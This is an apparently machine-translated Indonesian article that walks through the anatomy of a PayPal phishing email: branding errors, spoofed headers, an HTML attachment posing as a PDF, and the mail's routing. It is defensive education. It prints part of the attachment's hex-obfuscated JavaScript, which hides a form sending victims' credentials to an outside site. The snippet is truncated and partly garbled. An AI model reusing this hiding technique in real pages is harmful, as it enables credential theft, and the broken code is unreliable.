Keamanan Online: Memecah Anatomi Email Phishing

Anonim


Di dunia sekarang ini di mana informasi semua orang online, phishing adalah salah satu serangan online paling populer dan menghancurkan, karena Anda selalu dapat membersihkan virus, tetapi jika detail perbankan Anda dicuri, Anda dalam masalah. Berikut ini rincian dari salah satu serangan yang kami terima.

Jangan berpikir bahwa itu hanya detail perbankan Anda yang penting: setelah semua, jika seseorang mendapatkan kendali atas login akun Anda, mereka tidak hanya mengetahui informasi yang terkandung dalam akun itu, tetapi kemungkinannya adalah bahwa informasi login yang sama dapat digunakan pada berbagai lainnya akun. Dan jika mereka membahayakan akun email Anda, mereka dapat mengatur ulang semua kata sandi Anda yang lain.

Jadi, selain menjaga kata sandi yang kuat dan beragam, Anda harus selalu mencari surel palsu yang menyamar sebagai yang asli. Meskipun sebagian besar upaya phishing bersifat amatir, beberapa di antaranya cukup meyakinkan sehingga penting untuk memahami cara mengenalinya di tingkat permukaan serta cara kerjanya di bawah tenda.

Meneliti Apa yang Ada di Penglihatan Biasa

Email contoh kami, seperti kebanyakan upaya phishing, “memberi tahu” Anda tentang aktivitas di akun PayPal Anda yang, dalam keadaan normal, akan mengkhawatirkan. Jadi ajakan untuk bertindak adalah memverifikasi / memulihkan akun Anda dengan mengirimkan hampir setiap informasi pribadi yang dapat Anda pikirkan. Sekali lagi, ini sangat formula.

Meskipun tentu saja ada pengecualian, hampir setiap email phishing dan scam dimuat dengan bendera merah langsung di pesan itu sendiri. Bahkan jika teksnya meyakinkan, Anda biasanya dapat menemukan banyak kesalahan yang berserakan di seluruh badan pesan yang menunjukkan pesan tersebut tidak sah.

Badan Pesan

Pada pandangan pertama, ini adalah salah satu email phising yang lebih baik yang pernah saya lihat. Tidak ada kesalahan ejaan atau tata bahasa dan kata-kata bertuliskan sesuai dengan apa yang Anda harapkan. Namun, ada beberapa tanda merah yang dapat Anda lihat ketika Anda memeriksa konten sedikit lebih dekat.

  • "Paypal" - Kasing yang benar adalah "PayPal" (huruf P). Anda dapat melihat kedua variasi digunakan dalam pesan. Perusahaan sangat berhati-hati dengan branding mereka, jadi diragukan bahwa hal seperti ini akan melewati proses pemeriksaan.
  • "Izinkan ActiveX" - Berapa kali Anda melihat bisnis berbasis web yang sah, ukuran Paypal menggunakan komponen berpemilik yang hanya berfungsi pada satu browser, terutama ketika mereka mendukung banyak browser? Tentu, di suatu tempat di luar sana ada perusahaan yang melakukannya, tapi ini bendera merah.
  • "Aman." - Perhatikan bagaimana kata ini tidak sejajar dengan margin teks paragraf lainnya. Bahkan jika saya meregangkan jendela sedikit lebih, itu tidak membungkus atau ruang dengan benar.
  • "Paypal!" - Ruang sebelum tanda seru terlihat canggung. Hanya kekhasan lain yang saya yakin tidak akan ada dalam email yang sah.
  • "PayPal- Form Pembaruan Akun.pdf.htm" - Mengapa Paypal melampirkan "PDF" terutama ketika mereka hanya bisa menautkan ke halaman di situs mereka? Selain itu, mengapa mereka mencoba menyamarkan file HTML sebagai PDF? Ini adalah bendera merah terbesar dari semuanya.

Header Pesan

Saat Anda melihat header pesan, beberapa tanda merah lainnya muncul:

  • Alamat dari adalah
  • Alamat to tidak ada. Saya tidak mengosongkan ini, itu hanya bukan bagian dari header pesan standar. Biasanya perusahaan yang memiliki nama Anda akan mempersonalisasi email kepada Anda.

Lampiran

Ketika saya membuka lampiran, Anda dapat segera melihat tata letak yang salah karena tidak ada informasi gaya. Sekali lagi, mengapa PayPal mengirim email berupa HTML ketika mereka bisa memberi Anda tautan di situs mereka?

Catatan: kami menggunakan penampil lampiran HTML bawaan Gmail untuk ini, tetapi kami menyarankan Anda JANGAN BUKA lampiran dari scammer. Tak pernah. Pernah. Mereka sangat sering berisi exploit yang akan menginstal trojan di PC Anda untuk mencuri info akun Anda.

Menggulir ke bawah sedikit lebih Anda dapat melihat bahwa formulir ini tidak hanya meminta informasi login PayPal kami, tetapi juga untuk informasi perbankan dan kartu kredit. Beberapa gambar rusak.

Jelas upaya phishing ini terjadi setelah semuanya dengan satu gerakan.

Kerusakan Teknis

Meskipun seharusnya cukup jelas berdasarkan apa yang ada di depan mata bahwa ini adalah upaya phishing, kita sekarang akan memecah susunan teknis email dan melihat apa yang bisa kita temukan.

Informasi dari Lampiran

Hal pertama yang harus dilihat adalah sumber HTML dari formulir lampiran yang mengirimkan data ke situs palsu.

Saat melihat sumber dengan cepat, semua tautan tampak valid karena menunjuk ke "paypal.com" atau "paypalobjects.com" yang keduanya sah.

Sekarang kita akan melihat beberapa informasi dasar halaman yang dikumpulkan Firefox di halaman tersebut.

Seperti yang Anda lihat, beberapa gambar diambil dari domain "blessedtobe.com", "goodhealthpharmacy.com" dan "pic-upload.de" alih-alih dari domain PayPal yang sah.

Informasi dari Header Email

Selanjutnya kita akan melihat header pesan email mentah. Gmail membuat ini tersedia melalui opsi menu Tampilkan Asli pada pesan.

Melihat informasi tajuk untuk pesan asli, Anda dapat melihat pesan ini dibuat menggunakan Outlook Express 6. Saya ragu PayPal memiliki seseorang di staf yang mengirim setiap pesan ini secara manual melalui klien email yang sudah ketinggalan zaman.

Sekarang melihat informasi perutean, kita dapat melihat alamat IP pengirim dan server surat relai.

Alamat IP "Pengguna" adalah pengirim asli. Melakukan pencarian cepat pada informasi IP, kita dapat melihat IP pengiriman di Jerman.

Dan ketika kita melihat server mail relai (mail.itak.at), alamat IP kita dapat melihat ini adalah ISP yang berbasis di Austria. Saya ragu PayPal merutekan email mereka langsung melalui ISP berbasis Austria ketika mereka memiliki server server besar yang dapat dengan mudah menangani tugas ini.

Kemana Data Pergi?

Jadi kami telah dengan jelas menentukan ini adalah email phising dan mengumpulkan beberapa informasi tentang dari mana pesan itu berasal, tetapi bagaimana dengan dari mana data Anda dikirim?

Untuk melihat ini, kita harus terlebih dahulu menyimpan lampiran HTM di desktop kita dan buka di editor teks. Menggulirnya, semuanya tampak dalam urutan kecuali ketika kita sampai pada blok Javascript yang tampak mencurigakan.

Mengurai sumber penuh dari blok Javascript terakhir, kita melihat:


// Hak Cipta © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i

Setiap kali Anda melihat string besar campuran huruf dan angka acak yang tertanam dalam blok Javascript, biasanya itu sesuatu yang mencurigakan. Melihat kode, variabel "x" diatur ke string besar ini dan kemudian diterjemahkan ke dalam variabel "y". Hasil akhir dari variabel "y" kemudian ditulis ke dokumen sebagai HTML.

Karena string besar terbuat dari angka 0-9 dan huruf af, kemungkinan besar dikodekan melalui konversi ASCII ke Hex sederhana:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772677fememain

Diterjemahkan ke:

Bukan kebetulan bahwa ini diterjemahkan menjadi tag formulir HTML yang valid yang mengirimkan hasilnya bukan ke PayPal, tetapi ke situs jahat.

Selain itu, ketika Anda melihat sumber HTML formulir, Anda akan melihat bahwa tag formulir ini tidak terlihat karena dihasilkan secara dinamis melalui Javascript. Ini adalah cara cerdas untuk menyembunyikan apa yang sebenarnya dilakukan HTML jika seseorang hanya melihat sumber yang dihasilkan dari lampiran (seperti yang kita lakukan sebelumnya) sebagai lawan dari membuka lampiran langsung di editor teks.

Menjalankan whois cepat di situs yang menyinggung, kita dapat melihat ini adalah domain yang dihosting di host web populer, 1and1.

Apa yang menonjol adalah domain menggunakan nama yang dapat dibaca (sebagai lawan dari sesuatu seperti "dfh3sjhskjhw.net") dan domain telah terdaftar selama 4 tahun. Karena itu, saya yakin domain ini dibajak dan digunakan sebagai pion dalam upaya phishing ini.

Sinisme adalah Pertahanan yang Baik

Ketika datang untuk tetap aman online, tidak ada salahnya untuk memiliki sedikit sinisme yang baik.

Walaupun saya yakin ada lebih banyak tanda merah pada contoh email, apa yang telah kami tunjukkan di atas adalah indikator yang kami lihat setelah beberapa menit pemeriksaan. Secara hipotesis, jika tingkat permukaan email meniru rekan yang sah 100%, analisis teknis masih akan mengungkapkan sifat aslinya. Inilah sebabnya mengapa perlu memeriksa apa yang Anda bisa dan tidak bisa lihat.

Pilihan Editor